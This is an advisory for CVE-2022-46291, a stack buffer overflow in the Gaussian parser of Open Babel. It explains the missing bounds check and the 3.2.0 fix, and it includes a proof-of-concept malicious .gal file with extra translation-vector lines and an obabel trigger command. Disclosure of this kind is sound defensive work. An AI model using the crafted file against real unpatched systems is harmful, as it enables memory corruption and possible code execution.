Severity: high (CVSS 7.8) · CVE-2022-46291 · Jul 1, 2026

CVE-2022-46291: Open Babel Gaussian Parser Stack Buffer Overflow via translationVectors

Pranav Khune
Penetration Testing Team Lead, SecureLayer7

A crafted Gaussian output file can write past the end of a 3-element stack array in Open Babel's chemistry file parser, potentially giving an attacker arbitrary code execution.

Package: openbabel
Ecosystem: pip
Affected: < 3.2.0
Fixed in: 3.2.0

The problem

Open Babel's Gaussian output reader in `gaussformat.cpp` declares a fixed-size stack array `vector3 translationVectors[3]` and an integer counter `numTranslationVectors = 0`.

When the parser encounters a `PeriodicType` line, it enters a `while` loop that reads subsequent lines and writes each one into the array, incrementing the counter with no upper-bound check. An attacker who supplies more than three translation-vector lines pushes writes beyond the array, corrupting adjacent stack memory.

The write lands in `vector3::Set()` with fully attacker-controlled x, y, z double values, making this a high-quality stack corruption primitive. CVSS 7.8 (local, no privileges required).

Proof of concept

A working proof-of-concept for CVE-2022-46291 in openbabel, with the exact payload below.

```bash
# Minimal malicious Gaussian output file (.gal)
# Triggers the OOB write: 4+ PeriodicType vector lines
# exceed the translationVectors[3] stack array bound.

 Entering Link 1 = /fake/l1.exe
 #p hf/sto-3g

 Fake molecule

 Standard orientation:
 ---------------------------------------------------------------------
 Center     Atomic      Atomic             Coordinates (Angstroms)
 Number     Number       Type             X           Y           Z
 ---------------------------------------------------------------------
      1          6           0        0.000000    0.000000    0.000000
 ---------------------------------------------------------------------
PeriodicType 100
 1 2 3 1.000000 2.000000 3.000000
 1 2 3 4.000000 5.000000 6.000000
 1 2 3 7.000000 8.000000 9.000000
 1 2 3 1.100000 2.200000 3.300000
 1 2 3 4.400000 5.500000 6.600000
 1 2 3 7.700000 8.800000 9.900000

# Trigger:
# $ obabel -i gal malicious.gal -o sdf
# => ASAN: stack-buffer-overflow WRITE of size 8
#    in GaussianOutputFormat::ReadMolecule (gaussformat.cpp:635)
```

The root cause (CWE-787) is the missing bounds check on `numTranslationVectors` before indexing into `translationVectors[numTranslationVectors++]`. The loop exits only when EOF is reached or a line has fewer than 6 tokens, so an attacker can keep supplying 6-token lines indefinitely.

Each overflowing write calls `vector3::Set(x, y, z)` with values parsed directly from attacker-supplied tokens via `atof()`, giving full control over the written doubles. Depending on the stack layout and compiler, this can overwrite saved frame pointers or return addresses.

The patch (commit 40e85213) adds a guard `if (numTranslationVectors < 3)` (or equivalent) before the write, breaking the unbounded loop as soon as the array is full.
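The loop shape described above, with the bounds check in place, as an added illustration that is not Open Babel's code (the `Vec3` and `PeriodicResult` types are hypothetical stand-ins for `vector3` and the parser's locals, and it assumes the last three tokens of each line are x, y, z). It parses the six-line block from the proof of concept and stops before a fourth element could be written, reporting that the block was truncated so a caller can choose to reject the file:

```cpp
#include <array>
#include <cstdlib>
#include <sstream>
#include <string>
#include <vector>

// Hypothetical stand-in for Open Babel's vector3; not the real class.
struct Vec3 { double x = 0, y = 0, z = 0; };
// Outcome of reading one PeriodicType block.
struct PeriodicResult {
    std::array<Vec3, 3> vectors{};  // fixed size, like translationVectors[3]
    int count = 0;                  // like numTranslationVectors
    bool truncated = false;         // a 6-token line arrived after the array was full
};

// Split a line on whitespace.
static std::vector<std::string> tokens(const std::string& line) {
    std::istringstream in(line);
    std::vector<std::string> out;
    for (std::string s; in >> s;) out.push_back(s);
    return out;
}

// Read the lines that follow a PeriodicType header. Exit conditions are the ones
// the advisory describes (EOF, or a line with fewer than 6 tokens); the added
// guard is the shape of the 3.2.0 fix: never write a 4th element.
// Assumption: the last three tokens of each line are x, y, z.
PeriodicResult parsePeriodicBlock(std::istream& in) {
    PeriodicResult r;
    std::string line;
    while (std::getline(in, line)) {
        auto t = tokens(line);
        if (t.size() < 6) break;                           // original loop exit
        if (r.count >= 3) { r.truncated = true; break; }   // the missing bounds check
        r.vectors[r.count] = Vec3{std::atof(t[3].c_str()), std::atof(t[4].c_str()),
                                  std::atof(t[5].c_str())};
        ++r.count;
    }
    return r;
}

// Constructed sample: the six 6-token lines from the proof of concept above.
PeriodicResult parseConstructedSample() {
    std::istringstream in(" 1 2 3 1.000000 2.000000 3.000000\n"
                          " 1 2 3 4.000000 5.000000 6.000000\n"
                          " 1 2 3 7.000000 8.000000 9.000000\n"
                          " 1 2 3 1.100000 2.200000 3.300000\n"
                          " 1 2 3 4.400000 5.500000 6.600000\n"
                          " 1 2 3 7.700000 8.800000 9.900000\n");
    return parsePeriodicBlock(in);
}
```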

The fix

Upgrade to Open Babel 3.2.0 (released 2026-05-26), which includes commit 40e85213 adding the missing array-bounds check before every `translationVectors[numTranslationVectors++]` write in the Gaussian, MSI, MOPAC, and MOPAC-IN readers. No workaround exists for older versions other than refusing to parse untrusted `.gal` / `.g09` / `.g16` files.

Reported by Cisco Talos Intelligence Group.

